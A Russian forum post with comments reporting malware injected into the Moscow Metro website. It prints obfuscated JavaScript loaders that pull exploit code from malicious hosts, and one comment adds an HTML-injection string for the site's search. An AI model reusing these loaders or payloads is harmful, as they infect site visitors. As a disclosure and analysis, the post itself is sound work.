Официальный сайт Московского метрополитена затроянили

    Открываем исходный код любой страницы mosmetro.ru, в начале видим вставку JavaScript кода:


    Смотрим последнюю строку злополучного файла:
    var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);

    После выполнения данного участка на странице происходит добавление ещё одного сценария, но уже по внешней ссылке:


    Которая после нескольких редиректов подбрасывает браузеру подходящий JS код эксплойта, использующий ту или иную актуальную уязвимость. Под Opera for Windows, например, самопроизвольно открывается вредоносный PDF файл, хотя интеграция PDF вьювера от Adobe Reader с браузером отключена.
    Для желающих покопаться в коде, вот образец JS кода и образец PDF документа. Антивирус Касперского полученный PDF детектирует как Exploit.Win32.Pidief.cyk. Остальные антивирусные продукты почти поголовно молчат — отчёт VirusTotal.

    По данным DomainTools и WebHosting.info к данному хосту (размещённому, естественно в Китае) привязано ещё несколько доменов, предположительно для аналогичных целей.

    P.S. Кстати, по адресу thetraf.net/tds/admin находится запароленный вход в админку Sutra TDS (TDS — traffic distribution system — система распределения траффика), если кто сможет дёрнуть оттуда какие-нибудь подробности. :)
    Поделиться публикацией
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама

    Комментарии 76

      0
      В Хроме не работает.
        +35
        А там вообще хоть что-нибудь работает? :)
          –1
          «что-нибудь» работает!!!)
            +6
            А как же, работает неработалка троянов)
            0
            Safari тож молчит
              0
              Не, у меня ругается.
              P.S. Я на маке.
              –3
              Все прекрасно работает! KIS сразу сообщил:
              Веб-сайт по адресу mosmetro.ru содержит элементы сайта thetraf.net, где, вероятно, размещено вредоносное ПО
                +10
                Наверное, все-таки, сам Chrome сообщил, а не «KIS»…
                –3
                печально, но в хроме работает, последняя дев-версия, попал на интернет гуард ру, где было предложено скачать проверяльщик на вирусы, МС эсеншелс подло промолчал
                  –2
                  это каким же надо быть дебилом, пытаться __продавать__ малвару в рунете )) гыгы
                    +1
                    это нам хорошо, мы знаем, что можно качать, а что нет.
                    а рядовой посетитель мосметро вряд ли сможет устоять перед соблазном провериться — на то и рассчитано. и ведь работает — сколько уже было примеров «ой, а у меня тут какое-то окошечко выскочило, что-то про вирусы говорит!»
                      0
                      По статистике в среднем каждый 50-й покупает, кстати.
                        0
                        это у буржуев, у нас даже за реальный софт не платят. даже долбаные winblockerы кейгенами дрючат )))
                  +27
                  эксплойт.вин32.пидиэф.сцук
                  • НЛО прилетело и опубликовало эту надпись здесь
                      –1
                      Скорее вообще не ставить Acrobat, а пользоваться альтернативами.
                      • НЛО прилетело и опубликовало эту надпись здесь
                          +3
                          Дыры конечно бывают у всех, но когда Adobe Reader стоит у 99% — какой смысл тратить время на эксплоиты под альтернативы?
                            0
                            Adobe Reader стоит далеко не на 99% всех компьютеров, но среди PDF вьюверов вообще у него доля весьма близкая к этому
                            0
                            Вопрос с ответом? Люблю софистику. Нет, это вы загадочным образом полагаете, что я наивен и полагаю, что только Adobe умеет делать дыры в ПО.

                            Наиболее часто эксплуатируются дыры браузерных плагинов Acrobat'а и Flash.

                            Первый в браузере вообще излишество, как и возможность открытия документов MS Office в окне MS Explorer.

                            Скажите, зачем вообще открывать PDF-документы в браузере? Насколько помню, браузерный плагин для PDF ставит только Acrobat.
                            • НЛО прилетело и опубликовало эту надпись здесь
                                0
                                Вы, собственно, о чём?
                                Чтобы что-то проникло через альтернативу надо скачать заражённый документ и открыть в альтернативном просмотрщике.
                                В случае с Adobe Reader'ом и установленным плагином вы вряд ли вообще узнаете, что скачивали и открывали документ PDF.
                                • НЛО прилетело и опубликовало эту надпись здесь
                                    0
                                    >> Чукча не читатель
                                    Похоже на то. Зачем что-то отключать, если можно не устанавливать?
                                    • НЛО прилетело и опубликовало эту надпись здесь
                          • НЛО прилетело и опубликовало эту надпись здесь
                        +4
                        Со страницы диагностики Гугл для thetraf.net:

                        Malicious software includes 14 trojan(s), 12 exploit(s).
                        This site was hosted on 1 network(s) including AS9803 (JINGXUN).

                        За последние 90 дней на этом сайте размещалось вредоносное программное обеспечение. Были заражены некоторые домены (12), включая fizika.lv/, luxuryfair.ru/, mosmetro.ru/.
                          0
                          Не плохо. Но, под Оперой в линуксе тупит что-то.
                            +5
                            на *nix это и не рассчитано
                              0
                              Понимаю, не попробовать не мог. Просто, констатация факта)
                                0
                                x: Сыну на первый комп поставлю windows
                                y: о_О почему не linux?
                                x: а как я потом ему объясню что такое вирусы?
                                  +1
                                  На линуксе вирусов нет?
                              0
                              Сафари на маке ругается «Вероятный сайт с вредоносным ПО» и не дает зайти
                                +12
                                Хром на маке тоже предупредил, но я ткнул в кнопку {Proceed anyway} и сделал это не зря! Красивая флешка просканировала мою c:\System32 и куки. Оказалось, что у меня туча вирусов и всего за 15 рублей по SMS я могу купить супер навороченную систему безопасности.

                                Надо маме позвонить – полюбому ведь купит, если найдёт :(
                                  +1
                                  Да, я вот так же сделал в Опере на мак.

                                  Меня перекинуло на inprotect.ru. Тоже проверил мою систему, преобразовал мою FAT16 в NTFS, настроил папки Мой компьютер и Мои документы, применил секретные приемы автозагрузки, разогнал все мои процессоры и видеокарты. (Еще определил операционную систему как Macintosh — аж дыхание перехватило от такой точности). Потом определил что компьютер работает в пол силы, и предложил мне послать смс на короткий номер…

                                  Интерестно, что в форме отправки смс есть сноска о том, что при оплате я соглашаюсь с пользовательским соглашением. Ссылки на пользовательское сообщение не обнаружилось, однако ссылка на «правила» оказалась тем самым соглашением, хотя все сделано так чтоб человек даже не помыслил об этом. И там:

                                  «inprotect.ru – это шуточный игровой сервис, предоставляющий пользователю доступ к Java-приложению на платной основе. inprotect.ru предоставляет Пользователю доступ к Java части приложения после произведения Пользователем оплаты.».

                                  Одно из самых интересных пользовательских соглашений, которые я читал. :-) И там оказывается не 15 руб, а 150 руб за 1 смс, а надо отправить 3 штуки, и тогда мне дадут доступ к ява-программе которая работает на мой страх и риск причем только под систему симбиан. Что делает данная программа в соглашении умалчивается… Однако —

                                  «inprotect.ru не гарантирует, что: услуги inprotect.ru будут соответствовать требованиям Пользователя; результаты, которые могут быть получены от inprotect.ru, будут точными и надежными; качество, услуг inprotect.ru будет соответствовать ожиданиям Пользователя; все программные ошибки в работе web-сайта inprotect.ru будут исправлены;»

                                  Так что все честно и законно. :-)
                                0
                                спасибо за инфо, сейчас потестирую на лисе и опере
                                  +13
                                  Видимо, недавнее повышение цен на проезд в метро кому-то не очень понравилось.
                                    0
                                    стоило тогда нанести более значительный удар по IT инфраструктуре метрополитена
                                      0
                                      И посидеть чуток? :-)))
                                        0
                                        «не пойман — не вор»
                                    +2
                                    Петя: Хмм… Программа из серии «поставил и забыл»…
                                    Вася: Троян?
                                      0
                                      Офигеть. Меня с Оперы из под Линукса перенаправило на thetraf.net, но только в первый раз. Потом уже сайт метро нормально открывался.
                                        +2
                                        Потом уже сайт метро нормально открывался.

                                        TDS просто вас пометила (IP-адрес + куки), чтобы не грузить несколько раз подряд одно и то же
                                      • НЛО прилетело и опубликовало эту надпись здесь
                                          +1
                                          Аналогично, только под Windows.
                                            +1
                                            интересный домен. я как то только сейчас обратил внимание на спам от друзей приходивший в асю на днях.
                                            в одном сообщение был inet-guards.com/ в другом inetguards.com/
                                            похоже все связано…
                                            +9
                                            Электромонтер из Липецка всё не успокоится, славы захотел человек =)
                                              0
                                              Только странный у него метод — задефейсил бы тогда хотя бы :)
                                                0
                                                Нет, это те же ребята, что прон включили на «большом экране».
                                                0
                                                Opera-win, идет на internet guard и предлагает чтото выполнять на Яве… Но она у меня не стоит).
                                                  0
                                                  Firefox (win) + Avira. Код вижу, ничего не происходит, система в норме.
                                                    0
                                                    Зашел на сайт СТС. В раздел программы «Галилео». Там ссылка сюда: club.ctc-tv.ru/viewtopic.php?t=37944. Хром ругается, касперский блокирует. Что такое? Массовая эпидемия? Случайность? Или же ложное срабатывание?
                                                      0
                                                      На сайте club.ctc-tv.ru левый яваскрипт: sitedrill.ru/club.ctc-tv.ru
                                                        0
                                                        Что левый понятно. Откуда взялся?
                                                          0
                                                          1. От проёбанного FTP-доступа (почти во всех случаях)
                                                          2. От дыр на сайте (реже)
                                                          3. От дыр на хостинге (редко)
                                                      0
                                                      Опера 10.10.

                                                      на сайте — всплывает окошко:
                                                      Внимание! система защиты обнаружила ваш IP адрес в черном списке… блаблабла, проверьтесь

                                                      Нод сказал:

                                                      thetraf.net/banner/0.icq множественные угрозы соединение прервано — изолирован Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files (x86)\Opera\opera.exe.

                                                      thetraf.net/banner/0.icq » ZIP » myf/y/LoaderX.class модифицированный Java/TrojanDownloader.Agent.NAC троянская программа

                                                      thetraf.net/banner/0.icq » ZIP » myf/y/PayloadX.class модифицированный Java/TrojanDownloader.Agent.NAD троянская программа
                                                        –4
                                                        На самом деле, в метро очень неудобно развешаны указатели. Они во-первых, невзрачные, во-вторых висят не там где нужно. Из-за этого приходится часто по две-три минуты тупить и бегать по станции с целью выяснить где расположен переход и с какой стороны нужный поезд. Видимо сайтом занимаются те же люди.
                                                          +1
                                                          Если образец js-кода из поста выполнить получиться следующее:
                                                          pastebin.ca/1753277

                                                          в переменой 'idsssss' конечно же ни что иное как шеллкод в котором ни что иное как ссылка на выдачу вредоносного ехе файла, выдача правда тоже не прямая, а видимо с проверкой сих кукисов:

                                                          SL_default_0000=_0_
                                                          SL_8_0000=_0_

                                                          которые были установлены еще в самом начале.
                                                            +1
                                                            noscript
                                                            • НЛО прилетело и опубликовало эту надпись здесь
                                                                +1
                                                                А что по-вашему приведено чуть ниже? В любом случае, Malzilla в помощь.
                                                                • НЛО прилетело и опубликовало эту надпись здесь
                                                              • НЛО прилетело и опубликовало эту надпись здесь
                                                                  +1
                                                                  Мммм… интересно сколько народу ломанулось на вирус посмотреть))) А сколько из них заразилось?
                                                                  • НЛО прилетело и опубликовало эту надпись здесь
                                                                    0
                                                                    Chrome 4.0.266.0 dev for Linux
                                                                    Зашел, испугался, скриптик много вирусов нашел
                                                                    Мой браузер он определил как сафари, да еще и под вендой, поискал у себя сафари — не нашел, венды не нашел тоже
                                                                    Поискал у себя FAT 16/32, тоже не нашел
                                                                    Поискал меню пуск, панель управления, реестр Windows XP, Мой компьютер, Мои документы и все остальное. Не нашел.
                                                                    Расплакался. :(
                                                                      –1
                                                                        0
                                                                        Рекомендую во избежание таких ситуаций настраивать файл .ftpaccess в корне сайта на доступ с ограниченных IP. Чтобы уж наверняка.
                                                                        А вообще в моей практике был найден и вирус на сайте «Премии Рунета», писал об этом тут — www.diablog.ru/archives/165
                                                                          0
                                                                          Вроде, пофиксили.
                                                                            +1
                                                                            как-то странно пофиксили )
                                                                            0
                                                                            Надо абузу на домен написать. По моему у сутры платная перепривязка к новому домену.
                                                                              0
                                                                              «О, троян, ща попробуем» :)
                                                                                +3
                                                                                свежие новости — тот троян, что на мосметро «установили» ддосит официальный сайт правительства США :)


                                                                                Кликабельно, см. внизу справа

                                                                                Ксати, на счет поиска на сайте — он прекрасно позволяет вставить любой контент в сайт

                                                                                Например, если поискать на сайте метро эту строчку:
                                                                                ''"><img src="http://www.ХХХХХХХХ.ru/ЛЮБАЯКАРТИНКА.jpg"/>

                                                                                Грузиться будет долго (внимание! Сайт заражен, запускайте только в песочнице!), но покажет любую картинку.
                                                                                  +2
                                                                                  А вот еще:
                                                                                  http_//www.mosmetro.ru/script.js
                                                                                  Там такоэ:
                                                                                  var _0x6c7a=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x7A\x69\x6E\x67\x73\x73\x2E\x63\x6F\x6D\x2F\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x3F\x73\x3D\x66\x30\x64\x63\x35\x33\x64\x35\x36\x62\x62\x36\x34\x64\x31\x35\x36\x31\x61\x34\x34\x38\x36\x33\x36\x32\x31\x32\x62\x61\x65\x31\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79\x3A\x20\x68\x69\x64\x64\x65\x6E\x3B\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];document[_0x6c7a[1]](_0x6c7a[0]);
                                                                                  А это
                                                                                  iframe src=«http_//lizingss.com//index.php?s=f0dc53d56bb64d1561a448636212bae1» style=«visibility: hidden;» width=«0» height=«0»></iframe
                                                                                    +1
                                                                                    хабралюди, может закидаем их админа/студию депешами на коня троянского? Доколе
                                                                                  0
                                                                                  А теперь на этот топик ругается Avast.

                                                                                  Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                                                                  Самое читаемое